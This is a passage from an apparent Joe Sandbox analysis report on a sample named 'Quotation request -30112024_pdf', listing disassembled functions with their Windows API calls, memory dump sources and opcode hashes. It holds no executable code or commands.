                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                    Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetParent.USER32(?), ref: 004503C8
                                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Proc$Parent
                                                                    • String ID:
                                                                    • API String ID: 2351499541-0
                                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                    Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchTranslate
                                                                    • String ID:
                                                                    • API String ID: 1795658109-0
                                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                    Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                    • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                    • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                    • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                    Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                    • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                    • _wcslen.LIBCMT ref: 00449519
                                                                    • _wcslen.LIBCMT ref: 00449526
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen$_wcspbrk
                                                                    • String ID:
                                                                    • API String ID: 2886238975-0
                                                                    • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                    • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                    • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                    • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                    Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __setmode$DebugOutputString_fprintf
                                                                    • String ID:
                                                                    • API String ID: 1792727568-0
                                                                    • Opcode ID: 5d4322aea4207270e306f71f31351bd3950e7b1fce0631062c9bba007b08485e
                                                                    • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                    • Opcode Fuzzy Hash: 5d4322aea4207270e306f71f31351bd3950e7b1fce0631062c9bba007b08485e
                                                                    • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                    Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                    • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                    • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                    • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                    Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                      • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                      • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                    • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                    • String ID: cdecl
                                                                    • API String ID: 3850814276-3896280584
                                                                    • Opcode ID: 8791bd385ad911e302230f453ee94e3228b88862fdf6aa3d8d13645c92189192
                                                                    • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                    • Opcode Fuzzy Hash: 8791bd385ad911e302230f453ee94e3228b88862fdf6aa3d8d13645c92189192
                                                                    • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                    Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                    • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                    • _memmove.LIBCMT ref: 0046D475
                                                                    • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 2502553879-0
                                                                    • Opcode ID: 4777d02d04a30dcfdb085943b42a4ccb2e6b73bd431d008d3c99f42dcf393561
                                                                    • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                    • Opcode Fuzzy Hash: 4777d02d04a30dcfdb085943b42a4ccb2e6b73bd431d008d3c99f42dcf393561
                                                                    • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                    Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32 ref: 00448C69
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                    • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                    • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 312131281-0
                                                                    • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                    • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                    • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                    • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                    Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastacceptselect
                                                                    • String ID:
                                                                    • API String ID: 385091864-0
                                                                    • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                    • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                    • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                    • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                    Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                    • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                    • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                    • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                    Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                    • GetStockObject.GDI32(00000011), ref: 00430258
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateMessageObjectSendShowStock
                                                                    • String ID:
                                                                    • API String ID: 1358664141-0
                                                                    • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                    • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                    • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                    • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                    Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
